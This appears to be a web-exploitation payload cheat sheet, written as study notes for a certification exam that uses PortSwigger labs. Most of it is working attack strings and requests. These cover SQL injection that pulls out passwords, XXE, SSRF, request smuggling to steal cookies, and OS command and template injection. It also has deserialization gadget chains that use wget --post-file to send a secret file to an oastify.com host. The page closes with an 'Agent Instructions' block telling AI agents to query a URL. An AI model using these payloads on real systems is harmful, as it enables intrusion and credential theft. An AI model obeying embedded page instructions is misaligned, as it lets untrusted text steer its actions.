#clause bypass
'+OR+1=1--
#login bypass
administrator'--
#union detection
'+ORDER+BY+1--
'+ORDER+BY+2--
'+ORDER+BY+3--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abcdef',NULL,NULL--
#Oracle version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
#MySQL and Microsoft version
'+UNION+SELECT+@@version,+NULL#
#Tables names
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
#Tables names Oracle
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
#More columns in one
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
### Blind SQLi
```
#Conditional response
TrackingId=xyz' AND '1'='1
TrackingId=xyz' AND '1'='2
#Table exist
TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
#User exist
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
#Password length
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
#Password guess
TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a
```
### Blind error based SQLi
```
TrackingId=xyz'||(SELECT '')||'
TrackingId=xyz'||(SELECT '' FROM dual)||
TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
```
### Visible Error
```
TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--
TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT username FROM users) AS int)--
TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
```
### Blind Time-based
```
TrackingId=x'||pg_sleep(10)--
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
```
### Out of Band Interactions
```
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
```
### SQLI inside XML
```
<@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities>
```
## XSS
### DOM-based XSS
* Using the **eval()** method evaluates or executes an argument.
* Using **atob()** or **btoa()** is function used for encoding to and from base64 format strings.
* If **eval()** being blocked then Alternatives:
* setTimeout("code")
* setInterval("code)
* setImmediate("code")
* Function("code")()
### XSS web messages
```
#reflected subdomain with XSS in productID
```
## XXE
```
#get file with external entities
]>
&xxe;
#ssrf atack to public adress
]>
&xxe;
```
### Blind XXE
```
#out of band blind xxe
]>
&xxe;
#out of band parameter entities
%xxe; ]>
```
### External DTD XXE
```
#malicious DTD out of band exfiltration
">
%eval;
%exfil;
%xxe;]>
#Error based
">
%eval;
%exfil;
%xxe;]>
```
### XInclude injection
```
```
### XXE image upload
```
#create local svg with whit content
]>
```
## SSRF
```
#try to change api to localhost
http://localhost/admin
#try call api on ip
http://192.168.0.1:6566/admin
http://127.0.0.1/admin
http://127.1/admin
#obfuscation of 'a'
http://127.1/%2561dmin
#open redirection ssrf
/product/nextProduct?path=http://192.168.0.12:6566/admin
```
## Request Smuggling
### CL.TE
```
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
X-Ignore: X
-------------------------------------------------------------------------------------
#Bypass front-end control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
-------------------------------------------------------------------------------------
#The front-end server adds an HTTP header to incoming requests containing their IP address
#host rewriting
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
X-abcdef-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close
x=1
-------------------------------------------------------------------------------------
#Steal user cookie
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=your-session-token
csrf=your-csrf-token&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=test
-------------------------------------------------------------------------------------
#smuggling request with xss inside the header
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked
0
GET /post?postId=5 HTTP/1.1
User-Agent: a"/>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1
```
### TE.CL
```
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
-------------------------------------------------------------------------------------
#Bypass frontend control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked
87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
```
### H2.CL
1. Send the request a few times and confirm that you receive a redirect to the exploit server.
2. Resend the request and wait for 10 seconds or so.
3. Go to the exploit server and check the access log. If you see a `GET /resources/` request from the victim, this indicates that your request smuggling attack was successful
```
POST / HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Content-Length: 0
GET /resources HTTP/1.1
Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Content-Length: 5
x=1
```
### H2.TE
Send the request to poison the response queue. You will receive the 404 response to your own request.
Wait for around 5 seconds, then send the request again to fetch an arbitrary response.
Repeat this process until you capture a 302 response containing the admin's new post-login session cookie.
Copy the session cookie and use it to send the following request:
`GET /admin HTTP/2`
`Host: YOUR-LAB-ID.web-security-academy.net`
`Cookie: session=STOLEN-SESSION-COOKIE`
```
POST /x HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Transfer-Encoding: chunked
0
GET /x HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
```
### H2 CRLF Injeciton
[](https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/blob/main/images/http2-inspector.png)
> Note: enable the **Allow HTTP/2 ALPN override** option and change the body of HTTP/2 request to below POST request.
```
0
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=HACKER-SESSION-COOKIE
Content-Length: 800
search=nutty
```
### H2.TE desync v10a h2path
```
POST /x HTTP/2
Host: TARGET.net
Transfer-Encoding: chunked
0
GET /x HTTP/1.1
Host: TARGET.web-security-academy.net\r\n
\r\n
```
### CL.0
1. Using the drop-down menu next to the **Send** button, change the send mode to **Send group in sequence (single connection)**.
```
POST /resources/images/blog.svg HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Length: CORRECT
GET /admin HTTP/1.1
Foo: x
```
## OS cmd injection
```
storeID=1|whoami
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
email=||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||
#path traversal allowed
||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||
```
## SSTI
```
#those will throw an error
${{<%[%'"}}%\.
${{<%[%'"}}%\.,
}}{{7*7}}
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}
#ERB
<%= system("cat+/home/carlos/secret") %>
https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("cat+/home/carlos/secret")+%25>
#Tornado
POST /my-account/change-blog-post-author-display HTTP/2
Host: TARGET.net
Cookie: session=fenXl1hfjQBgGkrcmJoK7D8RU3eHkkCd
blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')
#Freemaker
${foobar}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }
#Handlebars, url encoded as url param
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
```
## Path Traversal
#JAVA
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections3 'wget http:// --post-file=/home/carlos/secret' | base64 -w 0
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections4 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0
#PHP
#path to find a secret
/cgi-bin/phpinfo.php
#command creation
/opt/phpggc/phpggc Symfony/RCE4 exec 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0
#payload creation
<?php
$object = "";
$secretKey = "q9ekwze228qxcdd9uvfjxxkfsipzq9ul";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;
#RUBY script -
# Autoload the required classes
Gem::SpecFetcher
Gem::Installer
# prevent the payload from running when we Marshal.dump it
module Gem
class Requirement
def marshal_dump
[@requirements]
end
end
end
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret")
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)
## JWT
```
#crack JWT secret
hashcat -a 0 -m 16500 /path/to/jwt.secrets.list
```
## Prototype pollution
```
#bypass sanitization
/?__pro__proto__to__[foo]=bar
/?__pro__proto__to__.foo=bar
/?constconstructorructor[protoprototypetype][foo]=bar
/?constconstructorructor.protoprototypetype.foo=bar
"__proto__": {
"isAdmin":true
}
#server side prototype pollution
"constructor": {
"prototype": {
"isAdmin":true
}
}
"__proto__": {
"execArgv":[
"--eval=require('child_process').execSync('cat /home/carlos/secret')"
]
}
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://oscp-7.gitbook.io/bscp-notes/payloads.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.